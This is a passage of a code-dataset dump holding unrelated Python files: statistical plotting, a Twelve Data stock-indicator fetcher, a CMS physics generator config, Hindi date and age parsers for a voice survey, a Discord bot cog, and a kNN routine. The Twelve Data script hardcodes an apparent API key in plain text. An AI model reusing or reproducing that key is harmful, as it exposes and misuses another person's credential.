return F.log_softmax(x, dim=1), emb\n","sub_path":"src/models/HGSL/HGSL.py","file_name":"HGSL.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"465842313","text":"\"\"\"\n\nBeta Distribution\n\n__author__ : 'vikas_rtr'\n__date__ : June 2015\n\n\"\"\"\n\nimport numpy as np\nfrom numpy import (exp, sqrt, pi)\nfrom scipy.special import gamma\n\nimport matplotlib.pyplot as plt\n\n\nclass beta_dist():\n\n \"\"\"Beta Distribution\n\n Interval : [0,1]\n loc = alpha = a\n scale = beta = b\n\n pdf = (gamma(a+b)* (x**(a-1))*((1-x)**(b-1)))/(gamma(a)*gamma(b))\n \"\"\"\n\n def __init__(self, loc=0, scale=1):\n self.a = loc\n self.b = scale\n\n def pdf(self, x):\n return (gamma(self.a + self.b) * (x ** (self.a - 1)) * ((1 - x) ** (self.b - 1))) / (gamma(self.a) * gamma(self.b))\n\nbta1 = beta_dist(loc=0.5, scale=0.5)\nbta2 = beta_dist(loc=5.0, scale=1.0)\nbta3 = beta_dist(loc=1.0, scale=3.0)\nbta4 = beta_dist(loc=2.0, scale=2.0)\nbta5 = beta_dist(loc=2.0, scale=5.0)\n\nfig, ax = plt.subplots(1, 1)\nplt.axis([0.0, 1.0, 0.0, 2.5])\nax.set_autoscale_on(False)\n\nx = np.linspace(0.01, 1.0, 200)\nplt.plot(x, bta1.pdf(x), 'r-', lw=1, alpha=0.8, label='beta (0.5,0.5)')\nplt.plot(x, bta2.pdf(x), 'm-', lw=1, alpha=0.8, label='beta (5,1)')\nplt.plot(x, bta3.pdf(x), 'g-', lw=1, alpha=0.8, label='beta (1,3)')\nplt.plot(x, bta4.pdf(x), 'k-', lw=1, alpha=0.8, label='beta (2,2)')\nplt.plot(x, bta5.pdf(x), 'y-', lw=1, alpha=0.8, label='beta (2,5)')\n\n# legend\nlegend = plt.legend(loc='upper right')\nplt.xlabel('x')\nplt.ylabel('pdf')\nplt.title('pdf of Beta Distribution')\nplt.show()\n","sub_path":"distributions/beta_dist.py","file_name":"beta_dist.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"470452336","text":"import pandas as pd\nfrom twelvedata import TDClient\n\nAPI_KEY = '228c71b89637460fb89a723c380d16ff'\nTICKER = 'AAPL'\nTIME_INTERVAL = '1min'\n\ntd = TDClient(apikey=API_KEY)\n\n#Change the symbol of the ticker here\nts = td.time_series(\n symbol= TICKER,\n interval= TIME_INTERVAL,\n timezone=\"America/New_York\"\n)\n\ndata= ts.with_macd().with_macd(fast_period=10).with_stoch().as_pandas()\n\ndef get_data():\n return { \"datetime\": data['datetime'], \"macd\": data['macd_1'], \"macd_signal\": data['macd_signal_1'], \"macd_hist\": data['macd_hist_1'] }","sub_path":"Task3/twelvedata_api/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"385639938","text":"class Solution:\n def permuteUnique(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n res=[]\n nums.sort()\n self.dfs(res, nums, 0)\n return res\n \n def dfs(self, res, nums, start):\n if start==len(nums):\n res.append(nums)\n return\n \n for i in range(start, len(nums)):\n if i!=start and nums[i]==nums[start]: continue\n nums[start], nums[i]=nums[i], nums[start]\n self.dfs(res, list(nums), start+1)\n","sub_path":"python/permutations-ii.py","file_name":"permutations-ii.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"470120321","text":"import FWCore.ParameterSet.Config as cms\n\nfrom Configuration.Generator.PythiaUESettings_cfi import *\n\nprocess = cms.Process(\"TEST\")\nprocess.load(\"FWCore.Framework.test.cmsExceptionsFatal_cff\")\nprocess.load(\"SimGeneral.HepPDTESSource.pythiapdt_cfi\")\n#process.load(\"SimGeneral.HepPDTESSource.pdt_cfi\")\n\nprocess.load(\"Configuration.StandardSequences.Services_cff\")\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(100)\n )\n\n\nprocess.RandomNumberGeneratorService = cms.Service(\n \"RandomNumberGeneratorService\",\n generator = cms.PSet(\n initialSeed = cms.untracked.uint32(123456789),\n engineName = cms.untracked.string('HepJamesRandom')\n )\n )\n\nprocess.randomEngineStateProducer = cms.EDProducer(\"RandomEngineStateProducer\")\n\n# The following three lines reduce the clutter of repeated printouts\n# of the same exception message.\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.destinations = ['cerr']\nprocess.MessageLogger.statistics = []\nprocess.MessageLogger.fwkJobReports = []\n\n#process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(50))\n\nprocess.source = cms.Source(\"LHESource\",\n fileNames = cms.untracked.vstring('file:/tmp/bianchi/fermi_events.lhe')\n)\n\nprocess.generator = cms.EDFilter(\n \"Pythia6HadronizerFilter\",\n pythiaHepMCVerbosity = cms.untracked.bool(True),\n maxEventsToPrint = cms.untracked.int32(0),\n pythiaPylistVerbosity = cms.untracked.int32(1),\n comEnergy = cms.double(7000.0),\n PythiaParameters = cms.PSet(\n pythiaUESettingsBlock,\n processParameters = cms.vstring('MSEL=0 ! User defined processes', \n 'PMAS(5,1)=4.4 ! b quark mass',\n 'PMAS(6,1)=172.4 ! t quark mass',\n 'MSTJ(1)=1 ! Fragmentation/hadronization on or off',\n 'MSTP(61)=1 ! Parton showering on or off'),\n # This is a vector of ParameterSet names to be read, in this order\n parameterSets = cms.vstring('pythiaUESettings', \n 'processParameters')\n ),\n jetMatching = cms.untracked.PSet(\n scheme = cms.string(\"Madgraph\"),\n mode = cms.string(\"auto\"),\t# soup, or \"inclusive\" / \"exclusive\"\n MEMAIN_etaclmax = cms.double(5.0),\n MEMAIN_qcut = cms.double(15.0),\n MEMAIN_minjets = cms.int32(0),\n MEMAIN_maxjets = cms.int32(5),\n MEMAIN_showerkt= cms.double(1),\n MEMAIN_excres = cms.string(\"\"),\n outTree_flag = cms.int32(0) \n ) \n )\n\nprocess.GEN = cms.OutputModule(\n \"PoolOutputModule\",\n fileName = cms.untracked.string('testMyProcess.root'),\n SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('p'))\n)\n\nprocess.p = cms.Path(process.generator)\nprocess.p1 = cms.Path(process.randomEngineStateProducer)\nprocess.outpath = cms.EndPath(process.GEN)\n\nprocess.schedule = cms.Schedule(process.p, process.p1, process.outpath)\n","sub_path":"Utilities/test/Py6HadFilter_mgmatching_cfg.py","file_name":"Py6HadFilter_mgmatching_cfg.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"447065004","text":"import datetime\nimport difflib\nimport json\nimport os\nimport re\nimport sys\n\nimport textdistance as td\n\nfrom dateparser.search import search_dates\nfrom dateutil.relativedelta import relativedelta\n\ndef get_digits(word):\n if not re.search('\\d+', word):\n # no digits from 0-9\n if not re.search('[०१२३४५६७८९]+', word):\n return -1\n return re.search('[०१२३४५६७८९]+', word).group()\n return re.search('\\d+', word).group()\n\ndef get_month(sent): # Similar to get education\n thresh = 0.65\n possible_words = {'शून्य':0,'एक':1,'दो':2,'तीन':3,'चार':4,'पांच':5,'छः':6,'सात':7,'आठ':8,'नौ':9,'लास्ट':9,'पहला':1,\n 'दूसरा':2,'तीसरा':3,'चौथा':4,'पांचवा':5,'छत्ता':6,'चट्टा':6,'सातवा':7,'आठवा':8,'नौंवा':9,'नवा':9,'शुरू':1,\n 'नाना':9}\n suffix = ['वी','टी','वा']\n general_words = {'हां':1,'हाँ':1,'सब':9,'नहीं':0,'ना':0}\n\n sent = sent.strip()\n words = sent.split()\n for word in words:\n digits = get_digits(word)\n if digits != -1:\n return int(digits)\n for pos_word in possible_words:\n if td.levenshtein.normalized_similarity(pos_word, word) >= thresh:\n return possible_words[pos_word]\n elif td.levenshtein.normalized_similarity(pos_word+suffix[0], word) >= thresh\\\n or td.levenshtein.normalized_similarity(pos_word+suffix[1], word) >= thresh\\\n or td.levenshtein.normalized_similarity(pos_word+suffix[2], word) >= thresh:\n return possible_words[pos_word]\n for gen_word in general_words:\n if gen_word == word: # It is better to have exact match here\n# print(word, gen_word)\n return general_words[gen_word]\n return -1\n\n\n# This function returns 1 for haa, 0 for na and -1 if none present\ndef findYesNo(sentence):\n yesList = ['हां','हाँ']\n noList = [ 'नहीं' , 'ना']\n ans = -1\n for word in sentence.split():\n if word in yesList:\n ans = 1\n break\n elif word in noList:\n ans = 0\n break\n else:\n continue\n \n if ans == -1:\n yesMatchList, noMatchList = [], []\n for word in sentence.split():\n yesMatchList.append(difflib.get_close_matches(word, yesList))\n noMatchList.append(difflib.get_close_matches(word, noList))\n \n if len(noMatchList)!=0 and len(yesMatchList) != 0:\n ans = -1\n elif len(noMatchList)!=0 :\n ans = 0\n elif len(yesMatchList)!=0 :\n ans = 1\n return ans\n else:\n return ans\n\n\ndef findDate(sentence):\n outSentence = {'Date':'-1','Month':'-1','Year':'-1'}\n\n rawMonths=['जनवरी','फरवरी','मार्च','अप्रैल','मई','जून','जुलाई','अगस्त','सितंबर','अक्टूबर','नवंबर','दिसंबर']\n hindiMonths=['चैत्र','बैसाख','ज्येष्ठ','आषाढ़','सावन','भाद्रपद','आश्विन','कार्तिक','अग्रहायण','पौष','माघ','फाल्गुन']\n hindiMonthsDict = {i:j for (j,i) in enumerate(hindiMonths)}\n hindiMonthPrefix=['पहला','दूसरा','तीसरा','चौथा','पांचवां','छठा','सातवां','आठवां','नौवां','दसवां','ग्यारहवां','बारहवां']\n hindiMonthPrefixDict = {i:j for (j,i) in enumerate(hindiMonthPrefix)}\n\n #Now for date and month\n flag=0\n for month in rawMonths:\n if month in sentence:\n outSentence['Month']=month\n flag=1\n break\n\n #Now checking for months in hindi\n if flag==0:\n for month in hindiMonths:\n if month in sentence:\n outSentence['Month']=month #rawMonths[hindiMonthsDict[month]]\n flag=1\n break\n\n item=sentence.replace(\"-\",\" \").split()\n\n #Now for hindi prefix like pehla mahina, dusra mahine, teesra mahina and continued till 12th months\n\n if(len(item)>=2):\n for i in range(len(item)-1):\n if item[i] in hindiMonthPrefix and (item[i+1]=='महीना' or item[i+1] == \"महिना\"):\n if flag==0:\n outSentence['Month'] = rawMonths[hindiMonthPrefixDict[item[i]]] #item[i]\n flag=1\n break\n\n# total+=len(item)\n\n #For Months\n if(len(item)>=2):\n for i in range(len(item)-1):\n if item[i].isdigit() and item[i+1].isdigit() and len(item[i])!=4 and len(item[i+1])!=4:\n if flag==0:\n if (int(item[i+1])) <= 12:\n outSentence['Month'] = rawMonths[int(item[i+1])-1] #item[i+1]\n flag=1\n break\n elif item[i].isdigit() and item[i+1].isdigit() and len(item[i])!=4 and len(item[i+1])==4:\n if flag==0:\n if len(item[i])==1 and int(item[i])!=0:\n outSentence['Month'] = rawMonths[int(item[i])-1] #item[i]\n flag=1\n break\n elif len(item[i])==3:\n if int(item[i][:2]) <= 31 and int(item[i][2]) != 0:\n outSentence['Month'] = rawMonths[int(item[i][2])-1] #item[i][2]\n flag = 1\n break\n elif int(item[i][:2]) <= 31 and int(item[i][2]) == 0:\n if int(item[i][1])==1:\n outSentence['Month'] = rawMonths[int(item[i][1:])-1] #item[i][1:]\n flag = 1\n break\n elif len(item[i])==2:\n if int(item[i])<=12:\n outSentence['Month'] = rawMonths[int(item[i])-1] #item[i]\n flag=1\n break\n else:\n outSentence['Month'] = rawMonths[int(item[i][1])-1] #item[i][1]\n flag = 1\n break\n else:\n z = 2 #dummy\n\n elif item[i].isdigit() and item[i+1].isdigit() and len(item[i])==4 and len(item[i+1])==4:\n if flag==0:\n if int(item[i+1]) <= 2100 and int(item[i+1]) >= 1900:\n if int(item[i][2:]) <= 12:\n outSentence['Month'] = rawMonths[int(item[i][2:])-1] #item[i][2:]\n flag = 1\n break\n else:\n z=2 #Dummy\n\n# if truthMonths[-1]==1:\n# trainMonthOut.append(1)\n# else:\n# trainMonthOut.append(0)\n\n flagDate=0\n if len(item)>=2:\n for i in range(len(item)-1):\n if item[i].isdigit() and item[i+1].isdigit() and len(item[i])!=4 and len(item[i+1])!=4:\n if flagDate==0:\n outSentence['Date'] = item[i]\n flagDate=1\n break\n elif item[i].isdigit() and len(item[i])!=4 and not item[i+1].isdigit() and int(item[i])<32:\n if flagDate==0:\n suppList = [\"साल\",\"महीना\",\"महिना\"]\n if not(item[i+1] in suppList):\n outSentence['Date'] = item[i]\n flagDate=1\n break\n elif item[i].isdigit() and item[i+1].isdigit() and len(item[i])!=4 and len(item[i+1])==4:\n if flagDate==0:\n if len(item[i])==3:\n if int(item[i][:2]) <= 31 and int(item[i][2]) != 0:\n outSentence['Date'] = item[i][:2]\n flagDate = 1\n break\n elif int(item[i][:2]) <= 31 and int(item[i][2]) == 0:\n if int(item[i][1])==1:\n outSentence['Date'] = item[i][0]\n flagDate = 1\n break\n elif len(item[i])==2:\n if int(item[i])<=12:\n z = 2 #Do nothing\n else:\n outSentence['Date'] = item[i][0]\n flagDate = 1\n break\n else:\n z = 2 #dummy\n elif item[i].isdigit() and item[i+1].isdigit() and len(item[i])==4 and len(item[i+1])==4:\n if flagDate==0:\n if int(item[i+1]) <= 2100 and int(item[i+1]) >= 1900:\n if int(item[i][2:]) <= 12:\n outSentence['Date'] = item[i][:2]\n flagDate = 1\n break\n else:\n z=2\n elif len(item) == 1:\n try:\n if type(int(item[0]))==int:\n if int(item[0]) <= 31:\n outSentence['Date'] = item[0]\n flagDate = 1\n except:\n z = 2 # Basically do nothing\n\n ##############################################################################################\n flagYear=0\n for items in sentence.replace(\"-\",\" \").split():\n try:\n if len(items) == 4 and int(items) > 1900 and int(items) < 2100:\n outSentence['Year'] = items\n flagYear=1\n break\n except:\n z=2 #Dummy z\n if flagYear!=1:\n words = sentence.replace(\"-\",\" \").split()\n for i in range(len(words)-2):\n try:\n if (type(int(words[i])) == int) and (type(int(words[i+1]))==int) and (type(int(words[i+2]))==int):\n if len(words[i+2])==2:\n if int(words[i+2]) > 50:\n outSentence['Year'] = \"19\"+words[i+2]\n else:\n outSentence['Year'] = \"20\"+words[i+2]\n flagYear = 1\n break\n except:\n z=2\n if flagYear!=1:\n words = sentence.replace(\"-\",\" \").split()\n for i in range(len(words)-1):\n if words[i] in rawMonths or words[i] in hindiMonths or words[i] in hindiMonthPrefix:\n if words[i+1].isdigit() and len(words[i+1])==2:\n if int(words[i+1])>=50:\n outSentence['Year'] = \"19\"+str(words[i+1])\n else:\n outSentence['Year'] = \"20\"+str(words[i+1])\n flagYear =1\n break\n\n# json_Output = json.dumps(outSentence,ensure_ascii=False)\n return outSentence\n \n\ndef preprocess_date(sent):\n thresh = 0.80\n hi_nums = ['शून्य','एक','दो','तीन','चार','पांच','छः','सात','आठ','नौ','दस','ग्यारह','बारह','तेरह','चौदह',\n 'पंद्रह','सोलह','सत्रह','अट्ठारह','उन्निस','बीस','इक्कीस','बाईस','तेईस','चौबीस','पच्चीस','छब्बीस','सत्ताईस','अट्ठाईस','उनतीस','���ीस','इकतीस',\n 'बत्तीस','तैंतीस','चौंतीस','पैंतीस','छ्त्तीस','सैंतीस','अड़तीस','उनतालीस','चालीस','इकतालीस','बयालीस','तैंतालीस','चौंतालीस',\n 'पैंतालीस','छियालीस','सैंतालीस','अड़तालीस','उनचास','पचास','इक्याबन','बावन','तिरेपन','चौबन','पचपन','छप्पन','सत्तावन',\n 'अट्ठावन','उनसठ','साठ','इकसठ','बासठ','तिरसठ','चौंसठ','पैंसठ','छियासठ','सड़सठ','अड़सठ','उनहत्तर','सत्तर','इकहत्तर',\n 'बहत्तर','तिहत्तर','चौहत्तर','पचहत्तर','छिहत्तर','सतहत्तर','अठहत्तर','उनासी','अस्सी','इक्यासी','बयासी','तिरासी','चौरासी',\n 'पचासी','छियासी','सतासी','अठासी' ,'नवासी','नब्बे','इक्यानबे','बानवे','तिरानवे','चौरानवे','पचानवे','छियानवे','सत्तानवे',\n 'अट्ठानवे','निन्यानवे' ,'सौ']\n \n pos_words = {'डेढ़':'1 साल 6 महीना', 'ढाई':'2 साल 6 महीना','डाइट':'2 साल 6 महीना', 'चार्ट':'साल', 'वर्स':'साल',\n 'वर्ष':'साल', 'नव':'9','नाना':'9', 'चैप्टर':'4', 'वाट':'साल'}\n \n words = sent.split(' ')\n out_sent = []\n for idx, word in enumerate(words): \n for pw_idx, pos_word in enumerate(hi_nums):\n if td.levenshtein.normalized_similarity(pos_word, word) >= thresh:\n words[idx] = str(pw_idx)\n for pos_word in pos_words:\n if td.levenshtein.normalized_similarity(pos_word, word) >= thresh:\n words[idx] = pos_words[pos_word]\n \n words = ' '.join(words)\n# print(words)\n return words\n\n\ndef get_age(sent):\n curr_date = datetime.datetime.now()\n\n sent = preprocess_date(sent)\n out = search_dates(sent)\n if out == None and re.search('\\d+', sent) != None:\n idx = re.search('\\d+', sent).end()\n out = search_dates(sent[:idx]+' साल'+sent[idx:])\n out_date = []\n age = []\n if out != None:\n for o in out:\n out_date.append(str(o[1].year) + ' years ' + str(o[1].month) + ' months ' + str(o[1].day) + ' days')\n age_diff = relativedelta(curr_date.date(),o[1].date())\n age.append(str(age_diff.years) + ' years ' + str(age_diff.months) + ' months ' + str(age_diff.days) + ' days ')\n return age\n","sub_path":"voice_survey_android_app/voicebotserver/vsurvey/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"524627502","text":"import asyncio\nimport os\nimport random\nimport sys\n\nimport aiohttp\nimport discord\nimport yaml\nfrom discord.ext import commands\nfrom discord.ext.commands import BucketType\n\nif not os.path.isfile(\"config.yaml\"):\n sys.exit(\"'config.yaml' not found! Please add it and try again.\")\nelse:\n with open(\"config.yaml\") as file:\n config = yaml.load(file, Loader=yaml.FullLoader)\n\n\nclass Fun(commands.Cog, name=\"fun\"):\n def __init__(self, bot):\n self.bot = bot\n\n \"\"\"\n Why 1 and 86400?\n -> Because the user should be able to use the command *once* every *86400* seconds\n \n Why BucketType.user?\n -> Because the cool down only affects the current user, if you want other types of cool downs, here are they:\n - BucketType.default for a global basis.\n - BucketType.user for a per-user basis.\n - BucketType.server for a per-server basis.\n - BucketType.channel for a per-channel basis.\n \"\"\"\n\n @commands.command(name=\"dailyfact\")\n @commands.cooldown(1, 86400, BucketType.user)\n async def dailyfact(self, context):\n \"\"\"\n Get a daily fact, command can only be ran once every day per user.\n \"\"\"\n # This will prevent your bot from stopping everything when doing a web request - see: https://discordpy.readthedocs.io/en/stable/faq.html#how-do-i-make-a-web-request\n async with aiohttp.ClientSession() as session:\n async with session.get(\"https://uselessfacts.jsph.pl/random.json?language=en\") as request:\n if request.status == 200:\n data = await request.json()\n embed = discord.Embed(description=data[\"text\"], color=config[\"main_color\"])\n await context.send(embed=embed)\n else:\n embed = discord.Embed(\n title=\"Error!\",\n description=\"There is something wrong with the API, please try again later\",\n color=config[\"error\"]\n )\n await context.send(embed=embed)\n # We need to reset the cool down since the user didn't got his daily fact.\n self.dailyfact.reset_cooldown(context)\n\n @commands.command(name=\"rps\")\n async def rock_paper_scissors(self, context):\n choices = {\n 0: \"rock\",\n 1: \"paper\",\n 2: \"scissors\"\n }\n reactions = {\n \"🪨\": 0,\n \"🧻\": 1,\n \"✂\": 2\n }\n embed = discord.Embed(title=\"Please choose\", color=config[\"warning\"])\n embed.set_author(name=context.author.display_name, icon_url=context.author.avatar_url)\n choose_message = await context.send(embed=embed)\n for emoji in reactions:\n await choose_message.add_reaction(emoji)\n\n def check(reaction, user):\n return user == context.message.author and str(reaction) in reactions\n\n try:\n reaction, user = await self.bot.wait_for(\"reaction_add\", timeout=10, check=check)\n\n user_choice_emote = reaction.emoji\n user_choice_index = reactions[user_choice_emote]\n\n bot_choice_emote = random.choice(list(reactions.keys()))\n bot_choice_index = reactions[bot_choice_emote]\n\n result_embed = discord.Embed(color=config[\"success\"])\n result_embed.set_author(name=context.author.display_name, icon_url=context.author.avatar_url)\n await choose_message.clear_reactions()\n\n if user_choice_index == bot_choice_index:\n result_embed.description = f\"**That's a draw!**\\nYou've chosen {user_choice_emote} and I've chosen {bot_choice_emote}.\"\n result_embed.colour = config[\"warning\"]\n elif user_choice_index == 0 and bot_choice_index == 2:\n result_embed.description = f\"**You won!**\\nYou've chosen {user_choice_emote} and I've chosen {bot_choice_emote}.\"\n result_embed.colour = config[\"success\"]\n elif user_choice_index == 1 and bot_choice_index == 0:\n result_embed.description = f\"**You won!**\\nYou've chosen {user_choice_emote} and I've chosen {bot_choice_emote}.\"\n result_embed.colour = config[\"success\"]\n elif user_choice_index == 2 and bot_choice_index == 1:\n result_embed.description = f\"**You won!**\\nYou've chosen {user_choice_emote} and I've chosen {bot_choice_emote}.\"\n result_embed.colour = config[\"success\"]\n else:\n result_embed.description = f\"**I won!**\\nYou've chosen {user_choice_emote} and I've chosen {bot_choice_emote}.\"\n result_embed.colour = config[\"error\"]\n await choose_message.add_reaction(\"🇱\")\n await choose_message.edit(embed=result_embed)\n except asyncio.exceptions.TimeoutError:\n await choose_message.clear_reactions()\n timeout_embed = discord.Embed(title=\"Too late\", color=config[\"error\"])\n timeout_embed.set_author(name=context.author.display_name, icon_url=context.author.avatar_url)\n await choose_message.edit(embed=timeout_embed)\n\n\ndef setup(bot):\n bot.add_cog(Fun(bot))\n","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"330184625","text":"#===============================================================================\n# Copyright 2012 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#===============================================================================\n\n#============= enthought library imports =======================\nfrom traits.api import Str, List, Instance\nfrom traitsui.api import View, Item\n#============= standard library imports ========================\n#============= local library imports ==========================\nfrom src.loggable import Loggable\nfrom src.arar.nodes.experiment import ExperimentNode\nimport os\nfrom src.graph.graph import Graph\nfrom src.database.core.database_adapter import DatabaseAdapter\n\n\nclass ArArWorkspace(Loggable):\n name = Str('Workspace')\n experiments = List(ExperimentNode)\n root = Str\n current_experiment = Instance(ExperimentNode)\n db = Instance(DatabaseAdapter)\n\n graph = Instance(Graph)\n\n def traits_view(self):\n v = View(\n Item('name', show_label=False, style='readonly'),\n )\n return v\n\n def init(self):\n self.info('initializing workspace {}'.format(self.root))\n if os.path.isdir(self.root):\n pass\n# if self.confirmation_dialog('Overwrite Directory {}'.format(self.root)):\n# pass\n else:\n os.mkdir(self.root)\n\n def new_experiment(self, name, kind):\n klass = '{}Node'.format(kind.capitalize())\n m = __import__('src.arar.nodes.{}'.format(kind), fromlist=[klass])\n cls = getattr(m, klass)\n exp = cls(name=name)\n self.current_experiment = exp\n self.experiments.append(exp)\n return exp\n\n def add_sample(self, sample):\n dbr = sample._db_result\n for ai in dbr.analyses:\n self._add_analysis(ai)\n\n def _add_analysis(self, ref):\n db = self.db\n exp = self.current_experiment\n irrad_pos = db.get_irradiation_position(ref.IrradPosition)\n#\n arar_analysis = ref.araranalyses[-1]\n rid = ref.RID\n kwargs = dict(\n sample=ref.sample.Sample,\n irradiation=irrad_pos.IrradiationLevel,\n age=arar_analysis.Age,\n age_err=arar_analysis.ErrAge\n )\n exp.load_analysis_reference(ref, rid, kwargs)\n\n exp.load_series_reference('airs', ref, rid, kwargs)\n\n\n def add_analyses(self, analyses):\n db = self.db\n for d in analyses:\n ref = db.get_analysis(d.rid)\n self._add_analysis(ref)\n\n# #refresh the plot\n# self._selected_changed()\n def has_node(self, node):\n if node in self.experiments:\n return True\n else:\n for exp in self.experiments:\n if exp.has_node(node):\n return True\n\n#===============================================================================\n# factories\n#===============================================================================\n def _graph_factory(self, shape):\n g = Graph(container_dict=dict(type='g',\n shape=shape,\n bgcolor='gray',\n padding=10\n ),\n )\n return g\n#===============================================================================\n# defaults\n#===============================================================================\n\n def _graph_default(self):\n return self._graph_factory((1, 1))\n#===============================================================================\n# views\n#===============================================================================\n# def configure_view(self):\n# v = View()\n# return v\n\n def graph_view(self):\n v = View(Item('graph',\n show_label=False,\n style='custom'))\n return v\n\n#============= EOF =============================================\n","sub_path":"src/zobs/arar/workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"522604011","text":"# Copyright 2021 BlobCity, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\n\"\"\"\nThis is a Custom Class to store Class reference data for YAML generation and process logging.\n\"\"\"\nclass DictClass:\n\n YAML=dict()\n ObjectExist= False\n ObjectList=None\n feature_importance=dict()\n def __int__(self):\n self.ObjectExist=False\n self.ObjectList=None\n self.YAML={}\n self.feature_importance=dict()\n def addKeyValue(self, key,value):\n \"\"\"\n param1:Class reference/Class object \n param2: String key\n param3: String value\n\n Function adds new key value pair into the class dictionary object\n \"\"\"\n self.YAML[key]=value\n\n def getdict(self):\n \"\"\"\n return : Dictionary \n\n Function returns the complete dictionary in current state\n \"\"\"\n return self.YAML\n\n def UpdateKeyValue(self,key,value):\n \"\"\"\n param1:class reference\n param2: String key\n param2: String /Dicionary\n\n Function updates a simple Dictionary Key value if the key exists else creates the entry\n \"\"\"\n if key in self.YAML.keys():\n self.YAML[key]=value\n else:\n DictClass.addKeyValue(self, key,value)\n\n def UpdateNestedKeyValue(self,key,key2,value):\n\n \"\"\"\n param1:Class reference\n param2:String key\n param3:String key\n param4:String/Dictionary\n\n Function Updates a nested Dictionary Value if the key exists else creates an entry for the key\n \"\"\"\n if key in self.YAML.keys():\n self.YAML[key][key2]=value\n else:\n self.YAML[key]={}\n self.YAML[key][key2]=value\n \n def resetVar(self):\n \"\"\"\n Function to reset class variables\n \"\"\"\n self.ObjectExist=False\n self.ObjectList=None\n self.YAML={}\n self.feature_importance={}\n \n","sub_path":"blobcity/store/DictClass.py","file_name":"DictClass.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"268582637","text":"import numpy as np\r\nimport math\r\nimport pandas as pd\r\nimport printData as PD_\r\n\r\n# k Nearest Neighbor algorithm\r\n# dfTrain : dataframe for training data\r\n# dfTest : dataframe for test data\r\n# dfTestWeight : weight of each test data column\r\n# caseWeight : weight by number of cases from training data\r\n# targetCol : target column for dfTrain\r\n# targetIndex : index for the target column\r\n# k : number of neighbors\r\n# useAverage : return average value\r\ndef kNN(dfTrain, dfTest, dfTestWeight, caseWeight, targetCol, targetIndex, k, useAverage):\r\n print('')\r\n print('+=======================+')\r\n print('| Function : kNN |')\r\n print('+=======================+')\r\n\r\n print('\\n<<< [17-before] dataFrame for training >>>')\r\n print(dfTrain)\r\n print('\\n<<< [18] dataFrame for test >>>')\r\n print(dfTest)\r\n\r\n # When using kNN, this is the final use of dfTrain and dfTest, so coverting of them does not cause any problem.\r\n # move target column of dfTrain to the most-right of dfTrain\r\n \r\n # find target column index of dfTrain\r\n cols = dfTrain.columns.tolist()\r\n targetColIndex = -1\r\n \r\n for i in range(len(cols)):\r\n if cols[i] == targetCol:\r\n targetColIndex = i\r\n break\r\n\r\n # move target column of dfTrain\r\n cols = cols[:targetColIndex] + cols[targetColIndex+1:] + [cols[targetColIndex]]\r\n dfTrain = dfTrain[cols]\r\n\r\n # count of each value for training data\r\n targetVals = list(set(dfTrain[targetCol].values)) # set of target values\r\n classCount = dfTrain[targetCol].value_counts() # class count for each target value\r\n\r\n print('\\n<<< [17-after] dataFrame for training >>>')\r\n print(dfTrain)\r\n\r\n # convert to numpy array\r\n dfTrain = np.array(dfTrain)\r\n dfTest = np.array(dfTest)\r\n \r\n # kNN classification result\r\n result = []\r\n resultT = [] # transport of result\r\n\r\n # if dfTestWeight is None, use equal weight for all test columns\r\n if dfTestWeight == None: dfTestWeight = [1]*len(dfTest[0])\r\n\r\n # mark the result using k-nearest neighbor\r\n for i in range(len(dfTest)): # for each test data\r\n if i % 10 == 0: print('test data ' + str(i))\r\n \r\n thisTestData = dfTest[i]\r\n\r\n # [distance between the test data and each training data, mark]\r\n distAndMark = []\r\n\r\n # for each training data\r\n for j in range(len(dfTrain)):\r\n \r\n thisTrainData = dfTrain[j]\r\n\r\n # calculate distance (using the weight) from the test data\r\n thisDistSquare = 0\r\n \r\n for l in range(len(dfTest[0])): # because test data contain all input columns\r\n\r\n if l == targetIndex: continue\r\n\r\n thisTestData[l] = float(thisTestData[l])\r\n thisTrainData[l] = float(thisTrainData[l])\r\n \r\n thisDistSquare = thisDistSquare + dfTestWeight[l] * pow(thisTestData[l] - thisTrainData[l], 2)\r\n\r\n # add to distAndMark (now, train output is at the right end of each training data row)\r\n 